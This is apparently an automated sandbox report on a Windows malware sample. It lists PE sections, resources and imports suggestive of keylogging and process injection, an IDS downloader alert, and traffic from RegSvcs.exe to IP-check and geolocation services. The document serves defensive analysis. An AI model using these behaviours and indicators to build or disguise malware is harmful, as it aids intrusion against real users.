                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x46ff8.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x10e0000x711c.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x8dcc40x8de00d28a820a1d9ff26cda02d12b888ba4b4False0.5728679102422908data6.676118058520316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0xc70000x46ff80x4700026fe582d2da1aa92bc27191609296708False0.9081928091989436data7.846330782981907IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x10e0000x711c0x72006fcae3cbbf6bfbabf5ec5bbe7cf612c3False0.7650767543859649data6.779031650454199IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                  RT_RCDATA0xcf7b80x3e2c0data1.0003377104800202
                                                                  RT_GROUP_ICON0x10da780x76dataEnglishGreat Britain0.6610169491525424
                                                                  RT_GROUP_ICON0x10daf00x14dataEnglishGreat Britain1.25
                                                                  RT_GROUP_ICON0x10db040x14dataEnglishGreat Britain1.15
                                                                  RT_GROUP_ICON0x10db180x14dataEnglishGreat Britain1.25
                                                                  RT_VERSION0x10db2c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                  RT_MANIFEST0x10dc080x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                  DLLImport
                                                                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                  UxTheme.dllIsThemeActive
                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishGreat Britain
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-16T14:11:35.342732+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549704193.122.130.080TCP
                                                                  2024-12-16T14:11:46.858321+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.549706193.122.130.080TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 16, 2024 14:11:33.746078014 CET4970480192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:33.865993023 CET8049704193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:33.866117954 CET4970480192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:33.879700899 CET4970480192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:33.999880075 CET8049704193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:34.962044954 CET8049704193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:34.966798067 CET4970480192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:35.086782932 CET8049704193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:35.289741993 CET8049704193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:35.342731953 CET4970480192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:35.461533070 CET49705443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:35.461607933 CET44349705104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:35.461680889 CET49705443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:35.627614975 CET49705443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:35.627640963 CET44349705104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:36.879631996 CET44349705104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:36.879811049 CET49705443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:36.886097908 CET49705443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:36.886116028 CET44349705104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:36.886519909 CET44349705104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:36.932908058 CET49705443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:36.975334883 CET44349705104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:37.320499897 CET44349705104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:37.320585012 CET44349705104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:37.320825100 CET49705443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:37.338390112 CET49705443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:45.104429007 CET4970680192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:45.224401951 CET8049706193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:45.228387117 CET4970680192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:45.228811026 CET4970680192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:45.348606110 CET8049706193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:46.334930897 CET8049706193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:46.342533112 CET4970680192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:46.462703943 CET8049706193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:46.806665897 CET8049706193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:11:46.808593988 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:46.808644056 CET44349709104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:46.808731079 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:46.813555002 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:46.813585997 CET44349709104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:46.858320951 CET4970680192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:11:48.032886982 CET44349709104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:48.032999992 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:48.044359922 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:48.044401884 CET44349709104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:48.045048952 CET44349709104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:48.096314907 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:48.108310938 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:48.151329994 CET44349709104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:48.478238106 CET44349709104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:48.478308916 CET44349709104.21.67.152192.168.2.5
                                                                  Dec 16, 2024 14:11:48.480309010 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:11:48.484153986 CET49709443192.168.2.5104.21.67.152
                                                                  Dec 16, 2024 14:12:40.289423943 CET8049704193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:12:40.289519072 CET4970480192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:12:51.803592920 CET8049706193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:12:51.803716898 CET4970680192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:13:15.312084913 CET4970480192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:13:15.431890011 CET8049704193.122.130.0192.168.2.5
                                                                  Dec 16, 2024 14:13:26.811697960 CET4970680192.168.2.5193.122.130.0
                                                                  Dec 16, 2024 14:13:26.932452917 CET8049706193.122.130.0192.168.2.5
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 16, 2024 14:11:33.600625992 CET5589753192.168.2.51.1.1.1
                                                                  Dec 16, 2024 14:11:33.738308907 CET53558971.1.1.1192.168.2.5
                                                                  Dec 16, 2024 14:11:35.304111958 CET5586853192.168.2.51.1.1.1
                                                                  Dec 16, 2024 14:11:35.444885969 CET53558681.1.1.1192.168.2.5
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 16, 2024 14:11:33.600625992 CET192.168.2.51.1.1.10xf124Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                  Dec 16, 2024 14:11:35.304111958 CET192.168.2.51.1.1.10x4c99Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 16, 2024 14:11:33.738308907 CET1.1.1.1192.168.2.50xf124No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 16, 2024 14:11:33.738308907 CET1.1.1.1192.168.2.50xf124No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                  Dec 16, 2024 14:11:33.738308907 CET1.1.1.1192.168.2.50xf124No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                  Dec 16, 2024 14:11:33.738308907 CET1.1.1.1192.168.2.50xf124No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                  Dec 16, 2024 14:11:33.738308907 CET1.1.1.1192.168.2.50xf124No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                  Dec 16, 2024 14:11:33.738308907 CET1.1.1.1192.168.2.50xf124No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                  Dec 16, 2024 14:11:35.444885969 CET1.1.1.1192.168.2.50x4c99No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                  Dec 16, 2024 14:11:35.444885969 CET1.1.1.1192.168.2.50x4c99No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                  • reallyfreegeoip.org
                                                                  • checkip.dyndns.org
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549704193.122.130.0806660C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 16, 2024 14:11:33.879700899 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Dec 16, 2024 14:11:34.962044954 CET321INHTTP/1.1 200 OK
                                                                  Date: Mon, 16 Dec 2024 13:11:34 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  X-Request-ID: ecccd52dfef66ed2af0c5547694cc57a
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                  Dec 16, 2024 14:11:34.966798067 CET127OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Dec 16, 2024 14:11:35.289741993 CET321INHTTP/1.1 200 OK
                                                                  Date: Mon, 16 Dec 2024 13:11:35 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  X-Request-ID: 992ba9afd18e09a0be27f73801f90c22
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.549706193.122.130.0803128C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 16, 2024 14:11:45.228811026 CET151OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
                                                                  Dec 16, 2024 14:11:46.334930897 CET321INHTTP/1.1 200 OK
                                                                  Date: Mon, 16 Dec 2024 13:11:46 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  X-Request-ID: d8a1bc54896af76b2f2360f0c067e8e1
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                  Dec 16, 2024 14:11:46.342533112 CET127OUTGET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Dec 16, 2024 14:11:46.806665897 CET321INHTTP/1.1 200 OK
                                                                  Date: Mon, 16 Dec 2024 13:11:46 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  X-Request-ID: e1460d3a70c9fe8b9cee8366ae90fc5d
                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.549705104.21.67.1524436660C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-16 13:11:36 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
                                                                  2024-12-16 13:11:37 UTC886INHTTP/1.1 200 OK
                                                                  Date: Mon, 16 Dec 2024 13:11:37 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Cache-Control: max-age=31536000
                                                                  CF-Cache-Status: HIT
                                                                  Age: 343466
